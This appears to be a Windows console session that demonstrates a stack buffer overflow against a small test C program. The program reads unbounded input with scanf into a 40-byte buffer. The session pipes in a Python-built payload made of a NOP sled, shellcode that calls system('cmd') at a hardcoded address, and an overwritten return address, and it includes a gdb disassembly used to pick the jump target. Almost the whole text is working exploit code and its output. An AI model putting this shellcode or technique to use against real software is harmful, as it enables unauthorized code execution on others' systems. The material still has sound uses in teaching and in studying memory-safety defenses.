C:\Users\Administrator\Desktop>cat test.c
#include<stdio.h>
main(int argc, char *argv[]){
        char buffer[40];
        printf("Hello world");
        scanf("%s",buffer);
        printf("%s\n",buffer);
        printf("%p\n",&argv[1]);
}

C:\Users\Administrator\Desktop>(python -c "print '\x90'*16+'\x55\x8b\xec\x33\xff
\x57\xc6\x45\xfc\x63\xc6\x45\xfd\x6d\xc6\x45\xfe\x64\x57\xc6\x45\xf8\x03\x8d\x45
\xfc\x50\xb8\x3c\x73\xe7\x77\xff\xd0\x58\x5d'+'\x4c\x0f\x6e\x00'")|test.exe
Hello worldU3WE?E?E?WE?E??s??]Ln
006E0F4C

C:\Users\Administrator\Desktop>gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=c:/mingw/bin/../libexec/gcc/mingw32/4.5.2/lto-wrapper.exe
Target: mingw32
Configured with: ../gcc-4.5.2/configure --enable-languages=c,c++,ada,fortran,obj
c,obj-c++ --disable-sjlj-exceptions --with-dwarf2 --enable-shared --enable-libgo
mp --disable-win32-registry --enable-libstdcxx-debug --enable-version-specific-r
untime-libs --disable-werror --build=mingw32 --prefix=/mingw
Thread model: win32
gcc version 4.5.2 (GCC)


C:\Users\Administrator\Desktop>gdb -q test.exe
Reading symbols from C:\Users\Administrator\Desktop/test.exe...(no debugging sym
bols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x004013c0 <+0>:     push   %ebp
   0x004013c1 <+1>:     mov    %esp,%ebp
   0x004013c3 <+3>:     and    $0xfffffff0,%esp
   0x004013c6 <+6>:     sub    $0x40,%esp
   0x004013c9 <+9>:     call   0x401a40 <__main>
   0x004013ce <+14>:    movl   $0x403064,(%esp)
   0x004013d5 <+21>:    call   0x401cb8 <printf>
   0x004013da <+26>:    lea    0x18(%esp),%eax
   0x004013de <+30>:    mov    %eax,0x4(%esp)
   0x004013e2 <+34>:    movl   $0x403070,(%esp)
   0x004013e9 <+41>:    call   0x401cc0 <scanf>
   0x004013ee <+46>:    lea    0x18(%esp),%eax
   0x004013f2 <+50>:    mov    %eax,(%esp)
   0x004013f5 <+53>:    call   0x401cb0 <puts>
   0x004013fa <+58>:    mov    0xc(%ebp),%eax
   0x004013fd <+61>:    add    $0x4,%eax
   0x00401400 <+64>:    mov    %eax,0x4(%esp)
   0x00401404 <+68>:    movl   $0x403073,(%esp)
   0x0040140b <+75>:    call   0x401cb8 <printf>
   0x00401410 <+80>:    leave
   0x00401411 <+81>:    ret
   0x00401412 <+82>:    nop
   0x00401413 <+83>:    nop
   0x00401414 <+84>:    add    %al,(%eax)
   0x00401416 <+86>:    add    %al,(%eax)
   0x00401418 <+88>:    add    %al,(%eax)
   0x0040141a <+90>:    add    %al,(%eax)
   0x0040141c <+92>:    add    %al,(%eax)
   0x0040141e <+94>:    add    %al,(%eax)
End of assembler dump.
(gdb) q

C:\Users\Administrator\Desktop>(python -c "print '\x90'*16+'\x55\x8b\xec\x33\xff
\x57\xc6\x45\xfc\x63\xc6\x45\xfd\x6d\xc6\x45\xfe\x64\x57\xc6\x45\xf8\x03\x8d\x45
\xfc\x50\xb8\x3c\x73\xe7\x77\xff\xd0\x58\x5d'+'\xc0\x13\x40\x00'")|test.exe
Hello worldU3WE?E?E?WE?E??s??]?@
005B0F4C
Hello worldU3WE?E?E?WE?E??s??]?]
005B1814

C:\Users\Administrator\Desktop>